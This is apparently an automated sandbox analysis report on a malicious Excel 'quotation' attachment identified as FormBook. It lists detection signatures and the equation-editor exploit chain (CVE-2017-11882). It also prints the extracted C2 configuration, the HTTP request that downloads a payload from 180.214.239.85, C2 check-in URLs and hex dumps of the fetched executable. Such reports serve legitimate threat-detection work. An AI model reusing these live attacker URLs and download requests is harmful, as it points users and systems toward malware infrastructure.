Windows Analysis Report (QUOTATION)B-RUS-20061REV2.xlsx

Overview

General Information

Sample Name: (QUOTATION)B-RUS-20061REV2.xlsx
Analysis ID: 491355
MD5: ecd068fb962c5a9452a6f22c0725521c
SHA1: fdf1a902181584d47cb1aed7ac2ca333dcc62e5e
SHA256: 3c3d0f13af1ccf38e72804d40b87dc215813ff6b36a20137d48c4a565c5a5c2e
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}
Multi AV Scanner detection for submitted file
Source: (QUOTATION)B-RUS-20061REV2.xlsx ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://180.214.239.85/service/rundll32.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe ReversingLabs: Detection: 13%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 13%
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.507251158.00000000007CA000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, msiexec.exe

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.paradisgrp.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 5_2_00407AFA
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_00417D59
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.85:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 180.214.239.85:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2022566 ET TROJAN Possible Malicious Macro EXE DL AlphaNumL 192.168.2.22:49165 -> 180.214.239.85:80
Source: Traffic Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 180.214.239.85:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 128.65.195.232:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.paradisgrp.com
Source: C:\Windows\explorer.exe Network Connect: 128.65.195.232 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.uvoyus.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.odysseysailingsantorini.com/cmsr/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: INFOMANIAK-ASCH INFOMANIAK-ASCH
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== HTTP/1.1Host: www.paradisgrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp HTTP/1.1Host: www.uvoyus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Sep 2021 12:04:10 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Mon, 27 Sep 2021 09:26:10 GMTETag: "a7600-5ccf6b00272b4"Accept-Ranges: bytesContent-Length: 685568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 8d 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6a 0a 00 00 0a 00 00 00 00 00 00 ee 88 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 88 0a 00 4f 00 00 00 00 a0 0a 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 69 0a 00 00 20 00 00 00 6a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 06 00 00 00 a0 0a 00 00 08 00 00 00 6c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 88 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc 43 02 00 f0 f2 00 00 03 00 00 00 01 01 00 06 cc 36 03 00 d0 51 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 7d 01 00 00 04 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 08 00 00 04 2a 1e 02 7b 08 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0c 00 00 04 2a 1e 02 7b 0c 00 00 04 2a 22 02 03 7d 0d 00 00 04 2a 1e 02 7b 0d 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0f 00 00 04 2a 1e 02 7b 0f 00 00 04 2a 22 02 03 7d 10 00 00 04 2a 1e 02 7b 10 00 00 04 2a 13 30 02 00 71 00 00 00 00 00 00 00 02 28 17 00 00 0a 00 00 02 16 28 1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /service/rundll32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.85Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.85
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 12:05:31 GMTServer: ApacheVary: accept-language,accept-charsetUpgrade: h2Connection: Upgrade, closeAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 31 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 39 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.532973112.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.530688122.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.666125665.0000000002170000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC400E1B.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.paradisgrp.com
Source: global traffic HTTP traffic detected: GET /service/rundll32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.85Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== HTTP/1.1Host: www.paradisgrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp HTTP/1.1Host: www.uvoyus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
